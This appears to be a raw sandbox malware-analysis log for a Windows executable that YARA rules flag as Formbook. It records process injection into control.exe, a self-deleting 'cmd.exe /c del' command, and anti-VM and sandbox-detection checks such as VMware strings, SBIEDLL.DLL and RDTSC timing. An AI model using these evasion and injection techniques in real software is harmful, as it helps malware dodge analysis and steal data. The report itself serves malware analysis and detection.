          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015199D0 NtCreateProcessEx,2_2_015199D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151B040 NtSuspendThread,2_2_0151B040
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519820 NtEnumerateKey,2_2_01519820
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015198A0 NtWriteVirtualMemory,2_2_015198A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519B00 NtSetValueKey,2_2_01519B00
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A3B0 NtGetContextThread,2_2_0151A3B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A10 NtQuerySection,2_2_01519A10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A80 NtOpenDirectoryObject,2_2_01519A80
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519560 NtWriteFile,2_2_01519560
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151AD30 NtSetContextThread,2_2_0151AD30
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519520 NtWaitForSingleObject,2_2_01519520
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015195F0 NtQueryInformationFile,2_2_015195F0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A770 NtOpenThread,2_2_0151A770
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519770 NtSetInformationFile,2_2_01519770
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519760 NtOpenProcess,2_2_01519760
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A710 NtOpenProcessToken,2_2_0151A710
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519730 NtQueryVirtualMemory,2_2_01519730
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519650 NtQueryValueKey,2_2_01519650
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519670 NtQueryInformationProcess,2_2_01519670
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519610 NtEnumerateValueKey,2_2_01519610
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015196D0 NtCreateKey,2_2_015196D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04BC9860
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9840 NtDelayExecution,LdrInitializeThunk,7_2_04BC9840
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC99A0 NtCreateSection,LdrInitializeThunk,7_2_04BC99A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC95D0 NtClose,LdrInitializeThunk,7_2_04BC95D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04BC9910
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9540 NtReadFile,LdrInitializeThunk,7_2_04BC9540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04BC96E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC96D0 NtCreateKey,LdrInitializeThunk,7_2_04BC96D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04BC9660
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A50 NtCreateFile,LdrInitializeThunk,7_2_04BC9A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9650 NtQueryValueKey,LdrInitializeThunk,7_2_04BC9650
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9780 NtMapViewOfSection,LdrInitializeThunk,7_2_04BC9780
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9FE0 NtCreateMutant,LdrInitializeThunk,7_2_04BC9FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9710 NtQueryInformationToken,LdrInitializeThunk,7_2_04BC9710
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC98A0 NtWriteVirtualMemory,7_2_04BC98A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC98F0 NtReadVirtualMemory,7_2_04BC98F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9820 NtEnumerateKey,7_2_04BC9820
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCB040 NtSuspendThread,7_2_04BCB040
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC95F0 NtQueryInformationFile,7_2_04BC95F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC99D0 NtCreateProcessEx,7_2_04BC99D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCAD30 NtSetContextThread,7_2_04BCAD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9520 NtWaitForSingleObject,7_2_04BC9520
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9560 NtWriteFile,7_2_04BC9560
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9950 NtQueueApcThread,7_2_04BC9950
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A80 NtOpenDirectoryObject,7_2_04BC9A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A20 NtResumeThread,7_2_04BC9A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9610 NtEnumerateValueKey,7_2_04BC9610
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A10 NtQuerySection,7_2_04BC9A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A00 NtProtectVirtualMemory,7_2_04BC9A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9670 NtQueryInformationProcess,7_2_04BC9670
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA3B0 NtGetContextThread,7_2_04BCA3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC97A0 NtUnmapViewOfSection,7_2_04BC97A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9730 NtQueryVirtualMemory,7_2_04BC9730
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA710 NtOpenProcessToken,7_2_04BCA710
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9B00 NtSetValueKey,7_2_04BC9B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9770 NtSetInformationFile,7_2_04BC9770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA770 NtOpenThread,7_2_04BCA770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9760 NtOpenProcess,7_2_04BC9760
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009481B0 NtCreateFile,7_2_009481B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009482E0 NtClose,7_2_009482E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00948260 NtReadFile,7_2_00948260
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00948390 NtAllocateVirtualMemory,7_2_00948390
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009482AC NtReadFile,7_2_009482AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094838B NtAllocateVirtualMemory,7_2_0094838B
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04B8B150 appears 35 times
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: String function: 014DB150 appears 48 times
          Source: lTAPQJikGw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilename vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.656995303.0000000000EC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilename vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000000.656432676.0000000000A52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000002.730181194.0000000001975000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: lTAPQJikGw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@12/11
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lTAPQJikGw.exe.log
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: lTAPQJikGw.exeVirustotal: Detection: 44%
          Source: lTAPQJikGw.exeReversingLabs: Detection: 43%
          Source: unknownProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exe
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: lTAPQJikGw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: lTAPQJikGw.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: lTAPQJikGw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\xxwqcHkmba\src\obj\Debug\CryptoConfig.pdb source: lTAPQJikGw.exe
          Source: Binary string: control.pdb source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lTAPQJikGw.exe, control.exe
          Source: Binary string: control.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_00EC5A3D push es; retf 0000h0_2_00EC5CE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B2A2 push cs; ret 2_2_0041B2A3
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3FB push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B45C push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00415414 push esp; ret 2_2_00415416
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00414F46 push cs; ret 2_2_00414F47
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041BF12 push dword ptr [8427D5C5h]; ret 2_2_0041C1FF
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00415FC5 push ebp; ret 2_2_00415FC6
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00A55A3D push es; retf 0000h2_2_00A55CE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0152D0D1 push ecx; ret 2_2_0152D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BDD0D1 push ecx; ret 7_2_04BDD0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B2A2 push cs; ret 7_2_0094B2A3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3A5 push eax; ret 7_2_0094B3F8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3F2 push eax; ret 7_2_0094B3F8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3FB push eax; ret 7_2_0094B462
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00945414 push esp; ret 7_2_00945416
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B45C push eax; ret 7_2_0094B462
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00945FC5 push ebp; ret 7_2_00945FC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094BF12 push dword ptr [8427D5C5h]; ret 7_2_0094C1FF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00944F46 push cs; ret 7_2_00944F47
          Source: initial sampleStatic PE information: section name: .text entropy: 7.73125493594
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: lTAPQJikGw.exe PID: 7056, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000009385E4 second address: 00000000009385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 000000000093896E second address: 0000000000938974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe TID: 7060Thread sleep time: -99171s >= -30000s
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe TID: 7092Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6088Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6800Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 99171
          Source: explorer.exe, 00000003.00000000.676441692.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
